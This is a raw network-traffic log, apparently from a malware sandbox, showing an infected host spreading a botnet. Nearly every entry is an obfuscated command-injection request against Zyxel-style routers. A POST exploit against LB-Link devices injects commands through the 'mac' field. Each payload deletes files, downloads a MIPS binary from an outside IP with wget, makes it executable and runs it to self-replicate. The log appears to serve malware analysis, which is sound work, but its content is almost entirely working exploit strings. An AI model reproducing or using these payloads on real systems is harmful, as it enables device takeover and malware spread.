                                                Jan 28, 2024 10:16:34.960360050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7014192.168.2.2338372114.205.172.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960381985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7015192.168.2.2341388114.73.217.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960386038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7016192.168.2.2347080112.38.122.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960405111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7017192.168.2.2337498174.99.16.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960460901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7018192.168.2.2341242152.168.45.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960480928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7019192.168.2.235932697.174.163.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960514069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7020192.168.2.234293840.110.251.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.960535049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7021192.168.2.234310459.87.90.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.963720083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7022192.168.2.2338612184.65.26.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.963761091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7023192.168.2.235296491.173.73.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.963763952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7024192.168.2.2341714186.207.160.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.963788033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7025192.168.2.234627213.164.167.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.963819981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7026192.168.2.2352842206.84.129.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.963840008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7027192.168.2.2350144193.210.32.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.963861942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7028192.168.2.2356108157.235.15.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.963891983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7029192.168.2.2358680147.15.144.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.963936090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7030192.168.2.2338756113.53.24.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.963958025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7031192.168.2.23559142.34.54.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.963975906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7032192.168.2.233620878.171.220.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964001894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7033192.168.2.2337826188.157.101.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964057922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7034192.168.2.233394236.143.228.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964075089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7035192.168.2.234764842.66.104.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964082956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7036192.168.2.2336556152.98.60.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964123964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7037192.168.2.234820282.31.3.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964133978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7038192.168.2.2341292104.71.163.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964147091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7039192.168.2.2344482165.153.85.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964154959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7040192.168.2.233993299.60.174.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964176893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7041192.168.2.2336746149.232.42.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964219093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7042192.168.2.234526618.242.28.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964246035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7043192.168.2.234460438.144.162.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964261055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7044192.168.2.2356144153.15.226.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964277029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7045192.168.2.2350880205.30.139.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964286089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7046192.168.2.2343268139.61.37.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964304924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7047192.168.2.2360756199.208.101.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964366913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7048192.168.2.234401646.219.196.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964394093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7049192.168.2.234155872.222.143.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964407921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7050192.168.2.2355258187.212.0.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964420080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7051192.168.2.2357584105.81.16.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964466095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7052192.168.2.2336076221.98.142.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.964503050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7053192.168.2.2353730216.175.48.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.965025902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7054192.168.2.233373882.131.14.868080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.036215067 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:37.397964954 CET128INHTTP/1.0 302 Redirect
                                                Server: PS HTTP Server
                                                Location: /index.asp
                                                Content-type: text/html
                                                Connection: close
                                                Jan 28, 2024 10:16:38.398066044 CET128INHTTP/1.0 302 Redirect
                                                Server: PS HTTP Server
                                                Location: /index.asp
                                                Content-type: text/html
                                                Connection: close
                                                Jan 28, 2024 10:16:40.398029089 CET128INHTTP/1.0 302 Redirect
                                                Server: PS HTTP Server
                                                Location: /index.asp
                                                Content-type: text/html
                                                Connection: close
                                                Jan 28, 2024 10:16:44.398046970 CET128INHTTP/1.0 302 Redirect
                                                Server: PS HTTP Server
                                                Location: /index.asp
                                                Content-type: text/html
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7055192.168.2.235956080.230.157.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.971698999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7056192.168.2.2358522180.53.26.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.971719027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7057192.168.2.235679078.227.73.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.971748114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7058192.168.2.2342578113.232.187.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.971754074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7059192.168.2.233723492.154.110.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.971786976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7060192.168.2.2356158180.239.142.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.971812963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7061192.168.2.2343528165.13.149.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.971853018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7062192.168.2.2355382125.135.30.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.971870899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7063192.168.2.235654489.98.29.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.971888065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7064192.168.2.234816267.36.245.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.971940041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7065192.168.2.234444686.45.94.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.971946001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7066192.168.2.234653659.241.101.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972003937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7067192.168.2.2339888121.188.212.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972024918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7068192.168.2.234292679.48.231.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972053051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7069192.168.2.2359620204.71.110.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972089052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7070192.168.2.2360172165.13.98.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972112894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7071192.168.2.233823465.190.22.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:35.972126961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7072192.168.2.23392584.46.227.153443
                                                TimestampBytes transferredDirectionData
